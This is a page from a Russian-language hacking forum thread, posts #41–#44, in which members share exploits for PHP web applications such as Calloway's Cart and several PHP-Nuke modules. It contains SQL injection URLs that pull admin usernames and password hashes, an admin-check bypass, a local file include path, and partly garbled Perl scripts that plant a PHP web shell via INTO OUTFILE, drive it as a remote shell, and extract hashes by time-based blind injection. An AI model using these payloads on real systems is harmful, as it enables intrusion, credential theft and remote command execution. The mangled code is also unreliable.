HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 24.11.2009, 20:32
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Calloway's_Cart_Pro_v.2.1b
Sql-injection
/ccsearch.php
PHP код:
<form name="form" action="ccsearch.php" method="get">
<
input type="text" name="results" />
<
input type="submit" name="Submit" value="Search" />
</
form>
$var = @$_GET['results'] ;
$trimmed trim($var); 
$limit=5
//Н-ко строк спустя).
mysql_connect($dbhost,$dbuname,$dbpass); 
mysql_select_db("$dbname") or die("Unable to select database"); 
$query "SELECT * FROM CCart_products where name like '%$trimmed%'"
$numresults=mysql_query($query); 
Exploit
Код:
/ccsearch?reuslts=1+union+select+user+from+mysql.users/*
 
Ответить с цитированием

  #42  
Старый 21.12.2009, 21:17
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Product: Module: UserControl
Author: pattidor@mail.ru
Version: V.1.0

Blind-SQL

file: admin/modules/usercontrol.php
В самом начале файла,защита:
PHP код:
if (!eregi("admin.php"$_SERVER['PHP_SELF'])) { die ("Access Denied"); }
global 
$prefix$db;
$aid substr("$aid"0,25);
$row $db->sql_fetchrow($db->sql_query("SELECT radminsuper FROM " $prefix "_authors WHERE aid='$aid'"));
if (
$row['radminsuper'] == 1) {
$module_name "usercontrol";
get_lang($module_name); 
Тоесть,вызвать скрипт можно только из админки.Простой и элегантный обход (:
Вызываем скрипт,например так:
target: http://example.com/admin/modules/usercontrol.php//admin.php?prefix={SQL}
Пробывал на никсах и окошках - прошло на ура.
Далее, $aid Как видим урезаеться до 25 символов.Если уложитесь - крутите через нее.Если нет - то есть еще $prefix
 
Ответить с цитированием

  #43  
Старый 07.05.2010, 19:07
phpdreamer
Постоянный
Регистрация: 26.07.2009
Сообщений: 321
Провел на форуме:
444589

Репутация: 123
Отправить сообщение для phpdreamer с помощью ICQ
По умолчанию

# Exploit Title: [PHP-Nuke 'friend.php' Module Remote SQL Injection]
# Date: [05.05.2010]
# Author: [CMD]
# Contact : cemede@ilkposta.com
# Version: [all version]

Example1:
Код:
 www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/**/where/**/radminsuper=1/*
Example2:
Код:
www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
 
Ответить с цитированием

  #44  
Старый 04.02.2012, 20:33
usr-bin
Guest
Сообщений: n/a
Провел на форуме:
8038

Репутация: 5
По умолчанию

Topic : Php-Nuke

Bug type : Local File Include Vulnerability

Author : ItSecTeam

===================== Content ======================

( # Advisory Content : Php-Nuke Lastest Version

( # Mail : Bug@ItSecTeam.com

( # Dork : Php-Nuke Lastest Version

( # We Are : M3hr@n.S , 0xd41684c654 And All Team Members!

( # Find By : Amin Shokohi(Pejvak!)

( # Published: 2010-03-14

=================================================

============================================= Exploit =======================================

( * http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Folder Name&file=File Name

( Ex : http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Content/admin&file=panel

================================================== =================================

# PHP-Nuke REMEMBER TO ADD THE FINAL / TO THE HOSTNAME ";# Change Here to

Set your custom shell(forexampleusesystem() );

my $cookies=HTTP::Cookies->new;

my $request=LWP::UserAgent->new;

$request->agent("Mozilla 5/0");

$request->cookie_jar($cookies);

#END VARS

sub Full_Path_Disclosure() {

my $Get=$request->get($host.'themes/NukeNews/theme.php');

if (
$Get->content=~ /No such fileordirectory in(.+?)on line/i) {

return $
1;

} else {

return
"failed";

}

}

print
" * Getting Full Path\n";

my $path=Full_Path_Disclosure();

die
" * Failed Path Extraction"if ($path eq"failed");

$path=~s/themes(\/|\\)NukeNews(\/|\\)theme.php//g;

print" * Full Path Found:$path\n";

if (
$path=~m/\\/) {

$path=~s/\\/\\\\\\\\/g;

}

print
" * Injecting Shell To$host\n";

my $req2=$request->post($host."modules.php?name=Your_Account&op=activate&usernam e=WTF",

{

check_num=>"'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM

`nuke_authors` INTO OUTFILE '
$path"."rce.php",

},

Referer=>$host."index.php");

print
" * Injecting Successfully Completed\n";

print
" * Shell now available on$host"."rce.php\n";

print
" * Connecting to remote shell\n";

sleep(4);

print
" * Connected.. Type \"quit\" to quit\n";

while() {

print
"* root\@backdoor ~\$ ";

$cmd= <>;

chomp($cmd);

lastif$cmd eq"quit";

$req2=$request->get($host."/rce.php?cmd=".$cmd);

print
$req2->content."\n";

}

[/COLOR]
[/PHP]

[COLOR="Green"]# [0-Day] PHP-Nuke aradox

# Greetings To: Shotokan-The Hacker, _mRkZ_, h473

# Web Site: www.warwolfz.org

# My Wagend (Dante90): dante90wwz.altervista.org

# ----

# Why have I decided to publish this?

# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published

# my own exploit, with their names.

# FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE

# ----

[PHP]
PHP:
[COLOR="#000000"]#!/usr/bin/perl

# [0-Day] PHP-Nuke
new(POST=>$HostName.'modules.php?name=Downloads&d_op=Add');

my $Cookies= newHTTP::Cookies;

my $UserAgent= newLWP::UserAgent(

agent=>'Mozilla/5.0',

max_redirect=>0,

cookie_jar=>$Cookies,

default_headers=>HTTP::Headers->new,

) or die $!;

my $WaRWolFz="http://www.warwolfz.org/";

my $DefaultTime=request($WaRWolFz);

my $Post;

sub Blind_SQL_Jnjection{

my($dec,$hex,$Victime) = @_;

return
"http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_auth ors WHERE aid='${Victime}";

}

for(
my $I=1;$I F

$Post=Blind_SQL_Jnjection($I,$chars[$J],$Victime);

$Time=request($Post);

sleep(3);

refresh($HostName,$DefaultTime,$chars[$J],$Hash,$Time,$I);

if (
$Time>4) {

$Time=request($Post);

refresh($HostName,$DefaultTime,$chars[$J],$Hash,$Time,$I);

if (
$Time>4) {

syswrite(STDOUT,chr($chars[$J]));

$Hash.=chr($chars[$J]);

$Time=request($Post);

refresh($HostName,$DefaultTime,$chars[$J],$Hash,$Time,$I);

last;

}

}

}

if(
$I==1&&length $Hashpost($HostName.'modules.php?name=Downloads&d_op=Add', {

title=>"Dante90",

url=>$Post,

description=>"WaRWolFz Crew",

auth_name=>"Dante90",

email=>"dante90.dmc4\@hotmail.it",

filesize=>"1024",

version=>"1",

homepage=>"http://www.warwolfz.org/",

d_op=>"Add"

},

Referer=>$HostName.'modules.php?name=Downloads&d_op=Add');

$Response->is_success() or die"$HostName: ",$Response->message,"\n";

$End=Time::HiRes::time();

$Time=$End-$Start;

return
$Time;

}

sub usage{

system("cls");

{

print
[COLOR="#DD0000"]" \n [0-Day] PHP-Nuke
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41
BookS: PHP, PERL, MySQL, JavaScript, HTML, ajax, Веб Дизайн M1nK0 PHP 10 27.06.2009 21:35
Что такое Php? PAPA212 Болталка 13 28.12.2007 20:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ